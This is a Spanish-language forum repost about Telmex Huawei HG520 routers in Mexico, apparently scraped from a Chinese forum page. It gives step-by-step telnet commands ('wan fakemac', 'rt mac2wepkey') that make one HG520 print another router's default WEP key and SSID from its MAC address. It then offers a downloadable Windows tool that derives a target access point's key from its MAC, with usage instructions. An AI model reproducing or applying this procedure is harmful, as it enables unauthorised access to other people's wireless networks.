Recientemente se ha publicado un trabajo realizado por un tal Humberto Ochoa (humberto121) en la red con el propósito de demostrar la vulnerabilidad en los módems Huawei modelos HG520 que usa el operador Telmex en México (redes INFINITUMXXXX). El propósito fue explicar la forma en la que desarrollaron un generador de contraseñas por defecto para estos modems.
Este trabajo fue publicado en los foros de la Comunidad Underground de México por un usuario con nick adiaz en Agosto del 2010 y a fecha 11-Enero-2011 Humberto Ochoa publica en el blog de websec los pasos realizados estos últimos meses para dar con el algoritmo.
Vaya desde aquí mis felicitaciones al autor por tan interesante trabajo.
post de adiaz:
============================================================
Obtener la WEP KEY predeterminada de un HG520 con otro HG520
============================================================
Probado en los Huawei EchoLife que da Telmex con las siguientes características:
Modelos = HG520c
Versiónes de software = V100R001B021Telmex , V100R001B020Telmex
Versiónes de Firmware = 3.10.18.7-1.0.7.0 , 3.10.18.5-1.0.7.0
Descripción
-----------
Estos routers forman su WEP KEY predeterminada con el comando 'mac2wepkey' disponible vía TELNET. Es posible ponerle a un HG520 la dirección MAC de otro y así generar su WEP KEY y SSID.
Instrucciones
-------------
1) Ingresar por telnet a nuestro router
telnet 192.168.1.254
Password: **********
2) Para configurar la nueva MAC escribimos:
wan fakemac xx:xx:xx:xx:xx:xx
3) Verificamos el cambio:
wan fakemac pvc disp
Fake MAC : xx:xx:xx:xx:xx:xx <- nueva MAC
Fake MAC : 00:00:00:00:00:00
Fake MAC : 00:00:00:00:00:00
Fake MAC : 00:00:00:00:00:00
Fake MAC : 00:00:00:00:00:00
Fake MAC : 00:00:00:00:00:00
Fake MAC : 00:00:00:00:00:00
Fake MAC : 00:00:00:00:00:00
4) Habilitamos la función:
rt mac2wepkey on
5) Finalmente generamos la WEP KEY:
rt mac2wepkey ssid INFINITUM
Obtenemos de respuesta los datos del otro EchoLife
wlanext SSID0 = INFINITUMxxxx, WEP KEY = 123457890
La herramienta publicada está escrita en python por lo que si se publica el código en C o alguien mas lo porta a este lenguaje mas adelante se puede crear una GUI. Entretanto he portado la herramienta con py2exe para poder usarla bajo Windows. En el enlace de descarga encontraréis una carpeta llamada INFINITUMXXXX y dentro de ella dos sub-carpetas llamadas dist y build con todos los archivos necesarios para que funcione en Windows.
Uso: desde la consola CMD debéis entrar en la carpeta dist y ahí llamar a la aplicación mac2wepkey.exe, hecho esto aparecerá una pantalla como esta donde solo debéis introducir la MAC del AP y pulsar intro para obtener la clave por defecto:
nota: Os aconsejo usar una aplicación gratuita que he subido hace tiempo al foro:
La aplicación tiene otros usos pero el que en este momento nos interesa es lanzar la consola CMD desde cualquier carpeta / HDD con un solo clíck (evitando lo comentado anteriormente).
下载地址:
狗仔卡
发表于 2011-11-10 05:56:10
提升卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主
发表于 2011-11-10 10:21:33
